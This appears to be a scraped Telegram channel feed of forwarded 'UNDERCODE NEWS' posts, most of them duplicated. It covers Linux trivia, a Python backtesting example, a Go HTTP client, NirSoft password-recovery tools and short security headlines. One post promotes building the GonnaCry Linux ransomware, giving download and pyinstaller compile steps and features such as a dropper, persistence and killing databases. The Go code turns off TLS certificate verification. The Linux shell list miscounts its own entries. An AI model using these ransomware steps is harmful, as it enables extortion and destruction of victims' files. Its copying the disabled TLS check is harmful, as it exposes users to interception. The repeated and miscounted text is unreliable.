Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ How many types of shells are there in Linux?
They are the five Shells in Linux:
1) C Shell (csh): Similar to C grammar, and provides spell checking and job control.
Korn Shell (ksh): is a high-level programming language Shell.
2) Z Shell (Zsh): It provides some unique properties, such as observing login/logout monitoring, file name generation, startup file, and end comment.
3) Bourne Again Shell (bash): This is the default setting of the Linux distribution.
4) Friendly interactive Shell (Fish): It provides web-based configuration, automatic suggestions, etc.
#FastTips
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ How many types of shells are there in Linux?
They are the five Shells in Linux:
1) C Shell (csh): Similar to C grammar, and provides spell checking and job control.
Korn Shell (ksh): is a high-level programming language Shell.
2) Z Shell (Zsh): It provides some unique properties, such as observing login/logout monitoring, file name generation, startup file, and end comment.
3) Bourne Again Shell (bash): This is the default setting of the Linux distribution.
4) Friendly interactive Shell (Fish): It provides web-based configuration, automatic suggestions, etc.
#FastTips
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
What are the basic components of Linux?
1) Kernel: It is the core component of Linux, which acts as an interface between software and hardware.
2) Shell: It acts as an interface between the user and the kernel.
3) GUI: It stands for Graphical User Interface, which is another way for users to interact with the system. But this is different from images, buttons, and text boxes for interaction.
4) System Utilities: These are software functions that allow users to manage the computer.
5) Application: A set of functions designed to perform a set of tasks.
#FastTips
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
What are the basic components of Linux?
1) Kernel: It is the core component of Linux, which acts as an interface between software and hardware.
2) Shell: It acts as an interface between the user and the kernel.
3) GUI: It stands for Graphical User Interface, which is another way for users to interact with the system. But this is different from images, buttons, and text boxes for interaction.
4) System Utilities: These are software functions that allow users to manage the computer.
5) Application: A set of functions designed to perform a set of tasks.
#FastTips
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
https://github.com/Awan check the contributions, I think I'm gonna get award of the year 2020 for most commits/contributions I have made ๐
Recommended repo by a friend
Recommended repo by a friend
GitHub
Awan - Overview
Lover of Prophet Muhammed PBUH. Awan has 44 repositories available. Follow their code on GitHub.
Forwarded from UNDERCODE NEWS
New critical vulnerability in Eclipse, an attacker to gain full access to the victim's workspace.
#Vulnerabilities
#Vulnerabilities
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆUpdated free Backtest trading strategies in Python:
1) download https://github.com/kernc/backtesting.py.git
2) $ pip install backtesting
Usage
from backtesting import Backtest, Strategy
from backtesting.lib import crossover
from backtesting.test import SMA, GOOG
class SmaCross(Strategy):
def init(self):
price = self.data.Close
self.ma1 = self.I(SMA, price, 10)
self.ma2 = self.I(SMA, price, 20)
def next(self):
if crossover(self.ma1, self.ma2):
self.buy()
elif crossover(self.ma2, self.ma1):
self.sell()
bt = Backtest(GOOG, SmaCross, commission=.002,
exclusive_orders=True)
stats = bt.run()
bt.plot()
๐ฆSTILL NOT GETTING ??
Checkout : https://kernc.github.io/backtesting.py/doc/backtesting/#manuals
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆUpdated free Backtest trading strategies in Python:
Sub-modules๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
backtesting.backtesting
Core framework data structures. Objects from this module can also be imported from the top-level module directly, e.g โฆ
backtesting.lib
Collection of common building blocks, helper auxiliary functions and composable strategy classes for reuse โฆ
backtesting.test
Data and utilities for testing.
1) download https://github.com/kernc/backtesting.py.git
2) $ pip install backtesting
Usage
from backtesting import Backtest, Strategy
from backtesting.lib import crossover
from backtesting.test import SMA, GOOG
class SmaCross(Strategy):
def init(self):
price = self.data.Close
self.ma1 = self.I(SMA, price, 10)
self.ma2 = self.I(SMA, price, 20)
def next(self):
if crossover(self.ma1, self.ma2):
self.buy()
elif crossover(self.ma2, self.ma1):
self.sell()
bt = Backtest(GOOG, SmaCross, commission=.002,
exclusive_orders=True)
stats = bt.run()
bt.plot()
๐ฆSTILL NOT GETTING ??
Checkout : https://kernc.github.io/backtesting.py/doc/backtesting/#manuals
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - kernc/backtesting.py: :mag_right: :snake: Backtest trading strategies in Python.
:mag_right: :chart_with_upwards_trend: :snake: :moneybag: Backtest trading strategies in Python. - GitHub - kernc/backtesting.py: :mag_right: :snake: Backtest trading strategies in Python.
Forwarded from UNDERCODE NEWS
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆExplain the process management system calls in Linux?
1) fork (): used to create a new process.
2) exec(): execute a new process.
3) wait(): Wait until the process is executed.
4) exit(): Exit the process.
ยป System call to get the process ID:
1) getpid(): Find the unique process ID.
2) getppid(): Find the unique parent process ID.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆExplain the process management system calls in Linux?
1) fork (): used to create a new process.
2) exec(): execute a new process.
3) wait(): Wait until the process is executed.
4) exit(): Exit the process.
ยป System call to get the process ID:
1) getpid(): Find the unique process ID.
2) getppid(): Find the unique parent process ID.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from UNDERCODE NEWS
Hakuhodo DYMP offers streamlined dashboards for unified TV management and digital advertising efficiency.
#Updates
#Updates
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCREATE YOUR OWN LINUX RANSOMWARE WITH ANY OS :
F E A T U R E S :
open terminal and type :
1) download https://github.com/tarcisio-marinho/GonnaCry/tree/master/src
GonnaCry requires the pycrypto library and requests, installation below
~$ sudo pip install -r requeriments.txt
2) Compiling the code
~$ pyinstaller -F --clean main.py -n gonnacry
3) ~$ pyinstaller -F --clean decryptor.py -n decryptor
4) RUN AS PYTHON :
main.py GonnaCry start file
daemon.py dropped by main.py and run
dropper.py drop the malware on the computer
decryptor.py communicate with the server, decrypt keys and files
symmetric.py AES encryption
asymmetric.py RSA encryption
generate_keys.py Generate random AES keys
persistence.py Persistence routines for linux OS
get_files.py Find files to be encrypted
environment.py environment variables
variables.py Images and malware binaries
utils.py Utilities routines
Enjoy
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCREATE YOUR OWN LINUX RANSOMWARE WITH ANY OS :
F E A T U R E S :
encrypts all user files with AES-256-CBC.
Random AES key and IV for each file.
Works even without internet connection.
Communication with the server to decrypt Client-private-key.
encrypts AES key with client-public-key RSA-2048.
encrypts client-private-key with RSA-2048 server-public-key.
Changes computer wallpaper -> Gnome, LXDE, KDE, XFCE.
Decryptor that communicate to server to send keys.
python webserver
Daemon
Dropper
Kills databases
About
A Linux Ransomware
๐ธ๐ฝ๐
๐
๐ฐ๐ป๐ป๐ธ๐
๐ฐ๐
๐ธ๐พ๐ฝ & ๐
๐
๐ฝ :open terminal and type :
1) download https://github.com/tarcisio-marinho/GonnaCry/tree/master/src
GonnaCry requires the pycrypto library and requests, installation below
~$ sudo pip install -r requeriments.txt
2) Compiling the code
~$ pyinstaller -F --clean main.py -n gonnacry
3) ~$ pyinstaller -F --clean decryptor.py -n decryptor
4) RUN AS PYTHON :
main.py GonnaCry start file
daemon.py dropped by main.py and run
dropper.py drop the malware on the computer
decryptor.py communicate with the server, decrypt keys and files
symmetric.py AES encryption
asymmetric.py RSA encryption
generate_keys.py Generate random AES keys
persistence.py Persistence routines for linux OS
get_files.py Find files to be encrypted
environment.py environment variables
variables.py Images and malware binaries
utils.py Utilities routines
Enjoy
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GonnaCry/src at master ยท tarcisio-marinho/GonnaCry
A Linux Ransomware. Contribute to tarcisio-marinho/GonnaCry development by creating an account on GitHub.
Forwarded from UNDERCODE NEWS
The high-tech unemployed? The opportunity to educate non-technological employees under the shadow of the crown.
#international
#international
Forwarded from UNDERCODE NEWS
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
golang http request package code:
package utils
import (
"crypto/tls"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"strings"
"sync"
)
var (
GET_METHOD = "GET"
POST_METHOD = "POST"
SENDTYPE_FROM = "from"
SENDTYPE_JSON = "json"
)
type HttpSend struct {
Link string
SendType string
Header map[string]string
Body map[string]string
sync.RWMutex
}
func NewHttpSend(link string) *HttpSend {
return &HttpSend{
Link: link,
SendType: SENDTYPE_FROM,
}
}
func (h *HttpSend) SetBody(body map[string]string) {
h.Lock()
defer h.Unlock()
h.Body = body
}
func (h *HttpSend) SetHeader(header map[string]string) {
h.Lock()
defer h.Unlock()
h.Header = header
}
func (h *HttpSend) SetSendType(send_type string) {
h.Lock()
defer h.Unlock()
h.SendType = send_type
}
func (h *HttpSend) Get() ([]byte, error) {
return h.send(GET_METHOD)
}
func (h *HttpSend) Post() ([]byte, error) {
return h.send(POST_METHOD)
}
func GetUrlBuild(link string, data map[string]string) string {
u, _ := url.Parse(link)
q := u.Query()
for k, v := range data {
q.Set(k, v)
}
u.RawQuery = q.Encode()
return u.String()
}
func (h *HttpSend) send(method string) ([]byte, error) {
var (
req *http.Request
resp *http.Response
client http.Client
send_data string
err error
)
if len(h.Body) > 0 {
if strings.ToLower(h.SendType) == SENDTYPE_JSON {
send_body, json_err := json.Marshal(h.Body)
if json_err != nil {
return nil, json_err
}
send_data = string(send_body)
} else {
send_body := http.Request{}
send_body.ParseForm()
for k, v := range h.Body {
send_body.Form.Add(k, v)
}
send_data = send_body.Form.Encode()
}
}
client.Transport = &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
}
req, err = http.NewRequest(method, h.Link, strings.NewReader(send_data))
if err != nil {
return nil, err
}
defer req.Body.Close()
//่ฎพ็ฝฎ้ป่ฎคheader
if len(h.Header) == 0 {
//json
if strings.ToLower(h.SendType) == SENDTYPE_JSON {
h.Header = map[string]string{
"Content-Type": "application/json; charset=utf-8",
}
} else { //form
h.Header = map[string]string{
"Content-Type": "application/x-www-form-urlencoded",
}
}
}
for k, v := range h.Header {
if strings.ToLower(k) == "host" {
req.Host = v
} else {
req.Header.Add(k, v)
}
}
resp, err = client.Do(req)
if err != nil {
return nil, err
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
return nil, errors.New(fmt.Sprintf("error http code :%d", resp.StatusCode))
}
return ioutil.ReadAll(resp.Body)
}
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
golang http request package code:
package utils
import (
"crypto/tls"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"strings"
"sync"
)
var (
GET_METHOD = "GET"
POST_METHOD = "POST"
SENDTYPE_FROM = "from"
SENDTYPE_JSON = "json"
)
type HttpSend struct {
Link string
SendType string
Header map[string]string
Body map[string]string
sync.RWMutex
}
func NewHttpSend(link string) *HttpSend {
return &HttpSend{
Link: link,
SendType: SENDTYPE_FROM,
}
}
func (h *HttpSend) SetBody(body map[string]string) {
h.Lock()
defer h.Unlock()
h.Body = body
}
func (h *HttpSend) SetHeader(header map[string]string) {
h.Lock()
defer h.Unlock()
h.Header = header
}
func (h *HttpSend) SetSendType(send_type string) {
h.Lock()
defer h.Unlock()
h.SendType = send_type
}
func (h *HttpSend) Get() ([]byte, error) {
return h.send(GET_METHOD)
}
func (h *HttpSend) Post() ([]byte, error) {
return h.send(POST_METHOD)
}
func GetUrlBuild(link string, data map[string]string) string {
u, _ := url.Parse(link)
q := u.Query()
for k, v := range data {
q.Set(k, v)
}
u.RawQuery = q.Encode()
return u.String()
}
func (h *HttpSend) send(method string) ([]byte, error) {
var (
req *http.Request
resp *http.Response
client http.Client
send_data string
err error
)
if len(h.Body) > 0 {
if strings.ToLower(h.SendType) == SENDTYPE_JSON {
send_body, json_err := json.Marshal(h.Body)
if json_err != nil {
return nil, json_err
}
send_data = string(send_body)
} else {
send_body := http.Request{}
send_body.ParseForm()
for k, v := range h.Body {
send_body.Form.Add(k, v)
}
send_data = send_body.Form.Encode()
}
}
client.Transport = &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
}
req, err = http.NewRequest(method, h.Link, strings.NewReader(send_data))
if err != nil {
return nil, err
}
defer req.Body.Close()
//่ฎพ็ฝฎ้ป่ฎคheader
if len(h.Header) == 0 {
//json
if strings.ToLower(h.SendType) == SENDTYPE_JSON {
h.Header = map[string]string{
"Content-Type": "application/json; charset=utf-8",
}
} else { //form
h.Header = map[string]string{
"Content-Type": "application/x-www-form-urlencoded",
}
}
}
for k, v := range h.Header {
if strings.ToLower(k) == "host" {
req.Host = v
} else {
req.Header.Add(k, v)
}
}
resp, err = client.Do(req)
if err != nil {
return nil, err
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
return nil, errors.New(fmt.Sprintf("error http code :%d", resp.StatusCode))
}
return ioutil.ReadAll(resp.Body)
}
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from UNDERCODE NEWS
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆSpecial extractor tool for windows :
F E A T U R E S :
password recovery
network monitoring
retrieving information from web browsers
work with video / audio
work with the Internet
command line utilities
tabletop
work with Outlook / Office
programming tools
disk utilities
system utilities
other utilities
download:
http://www.nirsoft.net/utils/index.html
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆSpecial extractor tool for windows :
F E A T U R E S :
password recovery
network monitoring
retrieving information from web browsers
work with video / audio
work with the Internet
command line utilities
tabletop
work with Outlook / Office
programming tools
disk utilities
system utilities
other utilities
download:
http://www.nirsoft.net/utils/index.html
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
NirSoft
Freeware Tools and System Utilities for Windows
Unique collection of freeware utilities and freeware password recovery tools
Forwarded from UNDERCODE NEWS
Lastest report: Solarwinds FTP โsolarwinds123โ secret revealed in plain text?
#international
#international
Forwarded from UNDERCODE NEWS
Net One employees illegally leaked $US 2,126,795.66, purchased real estate in Okinawa using a privately owned company
#Leaks
#Leaks